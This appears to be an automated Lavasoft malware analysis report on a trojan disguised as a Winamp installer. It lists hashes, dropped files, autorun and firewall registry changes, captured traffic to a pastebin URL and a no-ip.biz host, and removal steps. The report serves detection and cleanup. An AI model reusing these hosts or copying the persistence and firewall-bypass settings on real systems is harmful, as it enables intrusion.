Trojan.MSIL.Zapchast.aehog (Kaspersky), Trojan.GenericKD.3075701 (AdAware), Installer.Win32.SmartIM.FD, InstallerSmartIM.YR (Lavasoft MAS)
Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 6b2a96bc3d18a5d5546eeb363f8585f1
SHA1: 9d067a565429a17951e389465e4b4d70246dc366
SHA256: 9e311091090cb688be24f80e6ab648f085f62c784fe4c7d8a4e93b838c1534bb
SSDeep: 393216:g6Pb7dod23L0btVB0AAupxr3hBmgfjDO9WlcKOyul0e1:gKb7W2b0plr3bmgfjDMWUy J1
Size: 17302542 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
downloader c sharp.exe:652
%original file name%.exe:632
netsh.exe:1480
The Trojan injects its code into the following process(es):
teskmanger.exe:516
winamp5666_full_all.exe:580
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process downloader c sharp.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)
The process %original file name%.exe:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
%Program Files%\winamp5666_full_all.exe (390963 bytes)
%Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
%Program Files%\downloader c sharp.exe (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (0 bytes)
The process winamp5666_full_all.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsv1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp (0 bytes)
Registry activity
The process downloader c sharp.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A 6A 38 64 3F 1F 15 E9 E1 0E 96 A9 8C BC 1E 3F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU]
"di" = "!"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "FireFox"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process teskmanger.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 76 5D F1 EE 84 42 CF CB 42 D1 2B 8F 34 E1 CF"
[HKCU\Software\17c320a39f13ba5af3ce000a29a3404e]
"[kl]" = ""
[HKCU]
"di" = "!"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Environment]
"SEE_MASK_NOZONECHECKS" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."
The process %original file name%.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"InstallSource" = "c:\"
"InstallDate" = "20160415"
"EstimatedSize" = "16922"
"UninstallString" = "%Program Files%\winamp\winamp\Uninstall.exe"
"DisplayVersion" = "5.666"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"downloader c sharp.exe" = "FireFox"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"Publisher" = "winamp"
"VersionMajor" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayIcon" = "%Program Files%\winamp\winamp\Uninstall.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%]
"winamp5666_full_all.exe" = "Winamp Installer"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 F2 01 E6 31 A2 5B AB ED CF 1F 9D 55 03 AC 72"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"DisplayName" = "winamp 5.666"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winamp 5.666]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\winamp\winamp\"
"Language" = "1033"
"VersionMinor" = "666"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process netsh.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 7D B4 FE 46 CC 89 60 0D E7 3F A4 47 72 BD E5"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
Adds a rule to the Windows firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Application Data]
"teskmanger.exe" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe:*:Enabled:teskmanger.exe"
The process winamp5666_full_all.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 40 0F 2A A8 D8 A1 71 9F 75 F6 D9 FF 60 71 46"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
| MD5 | File path |
|---|---|
| 227c6a6f69e227d79f08e44ee685785e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\teskmanger.exe |
| a1cd3f159ef78d9ace162f067b544fd9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\LangDLL.dll |
| bf712f32249029466fa86756f5546950 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsg3.tmp\System.dll |
| 227c6a6f69e227d79f08e44ee685785e | c:\Program Files\downloader c sharp.exe |
| 110cd80079e9572aef511b0491e63b8c | c:\Program Files\winamp5666_full_all.exe |
| 96360030a40dc543d5347e1cf917f530 | c:\Program Files\winamp\winamp\Uninstall.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
downloader c sharp.exe:652
%original file name%.exe:632
netsh.exe:1480
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Application Data\teskmanger.exe (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0002.tmp (1961 bytes)
%Program Files%\winamp5666_full_all.exe (390963 bytes)
%Program Files%\winamp\winamp\Uninstall.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\temp_0.tmp (47091 bytes)
%Program Files%\winamp\winamp\Uninstall.exe (4436 bytes)
%Program Files%\downloader c sharp.exe (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\0001.tmp (47091 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\LangDLL.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (45697 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"17c320a39f13ba5af3ce000a29a3404e" = "%Documents and Settings%\%current user%\Application Data\teskmanger.exe .."
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: winamp
Product Name:
Product Version:
Legal Copyright: winamp
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 5.666
File Description: winamp 5.666 Installation
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| CODE | 4096 | 148684 | 148992 | 4.57091 | 5e14e4ede2e2215bc7d72837b9871f8f |
| DATA | 155648 | 10388 | 10752 | 2.62963 | abafcbfbd7f8ac0226ca496a92a0cf06 |
| BSS | 167936 | 4341 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 176128 | 6040 | 6144 | 3.3864 | a4e0ac39d5ed487ceea059fa23dfce5e |
| .tls | 184320 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rdata | 188416 | 24 | 512 | 0.14174 | c4fdd0c5c9efb616fcc85d66056ca490 |
| .reloc | 192512 | 6276 | 6656 | 4.56552 | 867a1120317d51734587a74f6ee70016 |
| .rsrc | 200704 | 7388 | 7680 | 3.29485 | 0ca03688054739a451150988e825bf9e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 8
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://pastebin.com/raw/U2sjN8vL | 104.20.63.56 |
| qanasjrema.no-ip.biz | 62.16.66.195 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:39 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d27769c06538c3575da5b7981848a85761460674359; expires=Fri, 14-Apr-17 22:52:39 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: HIT
Expires: Thu, 14 Apr 2016 23:22:40 GMT
Server: cloudflare-nginx
CF-RAY: 293abab8081b16be-ARN
GET /raw/U2sjN8vL HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 14 Apr 2016 22:52:32 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d057bf8bde70568e9fc963af32899d2721460674352; expires=Fri, 14-Apr-17 22:52:32 GMT; path=/; domain=.pastebin.com; HttpOnly
X-Powered-By: PHP/5.5.5
Cache-Control: public, max-age=1801
Vary: Accept-Encoding
CF-Cache-Status: EXPIRED
Expires: Thu, 14 Apr 2016 23:22:33 GMT
Server: cloudflare-nginx
CF-RAY: 293aba8c3063373e-ARN
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_632:
.idata
.rdata
P.reloc
P.rsrc
uxtheme.dll
PSAPI.dll
kernel32.dll
1.1.4
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
URLInfoAbout
SOFTWARE\Microsoft\.NETFramework\policy
..\sim.exe
deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly
inflate 1.1.4 Copyright 1995-2002 Mark Adler
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
WinExec
gdi32.dll
GetKeyState
ExitWindowsEx
EnumWindows
winmm.dll
ole32.dll
comctl32.dll
shell32.dll
GetWindowsDirectoryA
RegQueryInfoKeyA
RegEnumKeyExA
RegCreateKeyExA
ShellExecuteExA
ShellExecuteA
cabinet.dll
KWindows
UrlMon
version="1.0.0.0"
name="Microsoft.Windows.SIM"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
winamp5666_full_all.exe_580:
.text
`.rdata
@.data
.ndata
.rsrc
@.reloc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
GetAsyncKeyState
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
.reloc
PeekNamedPipe
CreatePipe
nsExec.dll
GetProcessHeap
COMDLG32.dll
nsDialogs.dll
System.dll
Dialer.dll
LangDLL.dll
Nullsoft Install System v2.46.5-Unicode
logging set to %d
settings logging to %d
created uninstaller: %d, "%s"
WriteReg: error creating key "%s\%s"
WriteReg: error writing into "%s\%s" "%s"
WriteRegBin: "%s\%s" "%s"="%s"
WriteRegDWORD: "%s\%s" "%s"="0xx"
WriteRegExpandStr: "%s\%s" "%s"="%s"
WriteRegStr: "%s\%s" "%s"="%s"
DeleteRegKey: "%s\%s"
DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s
CopyFiles "%s"->"%s"
CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
Error registering DLL: Could not load %s
Error registering DLL: %s not found in %s
GetTTFFontName(%s) returned %s
GetTTFVersionString(%s) returned %s
Exec: failed createprocess ("%s")
Exec: success ("%s")
Exec: command="%s"
ExecShell: success ("%s": file:"%s" params:"%s")
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
Exch: stack
RMDir: "%s"
MessageBox: %d,"%s"
Delete: "%s"
File: wrote %d to "%s"
File: skipped: "%s" (overwriteflag=%d)
File: error creating "%s"
File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"
Rename failed: %s
Rename on reboot: %s
Rename: %s
IfFileExists: file "%s" does not exist, jumping %d
IfFileExists: file "%s" exists, jumping %d
CreateDirectory: "%s" created
CreateDirectory: can't create "%s" - a file already exists
CreateDirectory: can't create "%s" (err=%d)
CreateDirectory: "%s" (%d)
SetFileAttributes: "%s":X
Sleep(%d)
detailprint: %s
Call: %d
Aborting: "%s"
Jump: %d
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
install.log
%u.%u%s%s
Skipping section: "%s"
Section: "%s"
New install of "%s" to "%s"
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|/":
invalid registry key
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
x%c
RMDir: RemoveDirectory failed("%s")
RMDir: RemoveDirectory on Reboot("%s")
RMDir: RemoveDirectory("%s")
RMDir: RemoveDirectory invalid input("%s")
Delete: DeleteFile failed("%s")
Delete: DeleteFile on Reboot("%s")
Delete: DeleteFile("%s")
%s: failed opening file "%s"
\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
All Files|*.*
callback%d
kernel32.dll
wininet.dll
nsg3.tmp
File: wrote 5120 to "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\LangDLL.dll"
~1\Temp\nsg3.tmp\LangDLL.dll"
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp
:\Program Files\winamp5666_full_all.exe"
"%Program Files%\winamp5666_full_all.exe"
%Program Files%\Winamp
%Program Files%
winamp5666_full_all.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\winamp5666_full_all.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg3.tmp\install.ini
Visit hXXp://VVV.winamp.com/ for updates.
5.6.6.3516
teskmanger.exe_516_rwx_0099A000_00002000:
teskmanger.exe_516_rwx_675A6000_00003000: